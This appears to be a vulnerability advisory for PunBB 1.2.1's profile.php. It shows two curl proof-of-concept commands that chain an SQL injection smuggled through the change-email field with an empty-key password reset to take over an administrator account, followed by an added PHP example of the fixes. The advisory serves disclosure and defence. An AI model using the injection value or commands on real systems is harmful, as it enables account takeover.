Multiple vulnerabilities in punbb-1.2.1 profile.php
=======================================================
Description
-----------
A remote attacker without an account can set the password
of any user on the system to NULL, effectively shutting
them out of the system.
A user on the system can also inject an arbitrary
SQL statement using the change email feature. This
occurs because of a fault in the is_valid_email function,
which returns true for strings that are not even close to
being a valid email.
This also affects systems using the magic_quotes_gpc
option in php.ini.
By combining these two an attacker with an account on
the forum can change the password for any user to anything
he/she wants to, gaining full access to the administrator
account.
Proof of concept
----------------
Examples of the damage the DoS attack and the arbitrary
SQL statement attack can do on their own have been
omitted. This is a demonstration of their power when
combined.
Assumptions for this particular example:
- There is a user on the system with id 3 that has
username/password set to 'sha'/'passwd'.
- The cookie is valid for sha on the system.
- The system supports sha1.
- The new password for the id 2 account is supposed to
be 'newpass'.
curl --cookie punbb_cookie=<valid cookie> --form form_sent=1 --form req_new_email="6c55803d6f1d7a177a0db3eb4b343b0d50f9c111' -- [email protected]" http://target/profile.php?action=change_email\&id=3
This will push the sha1 hash of the password 'newpass'
into every user's activate_string field. All that needs
to be done is pushing this field into the password field
of any user we want using the other bug.
curl http://target/profile.php?action=change_pass\&id=2\&key=
Now the account with user id 2 has the password 'newpass' set.
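The chain above works because three server-side checks are missing: the email
string is not validated strictly, it is concatenated into the UPDATE (so the
quote and "--" comment out the WHERE clause and every row is written), and
change_pass accepts an empty key that matches an empty activate_string. The
following is an added example, not PunBB's own code, showing how a patched
profile.php flow would close each of those gaps. It uses an in-memory SQLite
table constructed here to stand in for the forum's users table; the function
names and the sample rows are assumptions made for the illustration.

```php
<?php
// Added example (not PunBB's code): the three checks that break the chain
// described in the advisory, run against a constructed in-memory table.

declare(strict_types=1);

// Strict e-mail validation. PHP's built-in filter rejects whitespace and
// anything that is not a single mailbox@domain token. It is a sanity check
// only; the prepared statements below are what actually stop the injection.
function is_valid_email_strict(string $email): bool
{
    return strlen($email) <= 254
        && filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT,
               password TEXT, activate_string TEXT)');
    $ins = $db->prepare('INSERT INTO users VALUES (?, ?, ?, ?)');
    // Constructed sample rows; the hashes are sha1 of the shown passwords.
    $ins->execute([2, 'admin', sha1('adminpass'), null]);
    $ins->execute([3, 'sha',   sha1('passwd'),    null]);
    return $db;
}

// change_email step: validate, then write ONLY a bound value, and only to the
// row of the authenticated user ($actor_id), never to an id taken from the URL.
// Returns the activation key (which a real handler would mail to $new_email)
// or null when the address is rejected.
function request_email_change(PDO $db, int $actor_id, string $new_email): ?string
{
    if (!is_valid_email_strict($new_email)) {
        return null;
    }
    $key = bin2hex(random_bytes(16));
    $st = $db->prepare('UPDATE users SET activate_string = ? WHERE id = ?');
    $st->execute([$key, $actor_id]);
    return $key;
}

// change_pass step: refuse a missing or empty key, and compare against the
// stored key with hash_equals so an empty or NULL activate_string never matches.
function finish_password_change(PDO $db, int $id, string $key, string $new_pw): bool
{
    if ($key === '') {
        return false;
    }
    $st = $db->prepare('SELECT activate_string FROM users WHERE id = ?');
    $st->execute([$id]);
    $stored = $st->fetchColumn();
    if (!is_string($stored) || $stored === '' || !hash_equals($stored, $key)) {
        return false;
    }
    $up = $db->prepare('UPDATE users SET password = ?, activate_string = NULL WHERE id = ?');
    $up->execute([sha1($new_pw), $id]);
    return true;
}

$db = make_db();

// The advisory's crafted address: a quote, a SQL comment and a space.
$crafted = "6c55803d6f1d7a177a0db3eb4b343b0d50f9c111' -- x@example.com";
echo 'crafted address accepted: ', var_export(is_valid_email_strict($crafted), true), "\n";
echo 'normal address accepted:  ', var_export(is_valid_email_strict('user@example.com'), true), "\n";

// Empty key against a NULL activate_string must be refused.
echo 'empty key accepted:       ', var_export(finish_password_change($db, 2, '', 'newpass'), true), "\n";

// Legitimate flow for user 3: request, then finish with the issued key.
$key = request_email_change($db, 3, 'sha@example.com');
echo 'legit flow succeeded:     ', var_export($key !== null && finish_password_change($db, 3, $key, 'newpass'), true), "\n";

// Rows other than the actor's are untouched; the key is no longer reusable.
$count = (int) $db->query('SELECT COUNT(*) FROM users WHERE activate_string IS NOT NULL')->fetchColumn();
echo 'rows still holding a key: ', $count, "\n";
```

Run it with `php` (the pdo_sqlite extension must be loaded). The two
points a reviewer should take from it are that the WHERE clause is
bound to the session's own user id rather than to the `id` query
parameter, and that change_pass never treats an absent key as a match.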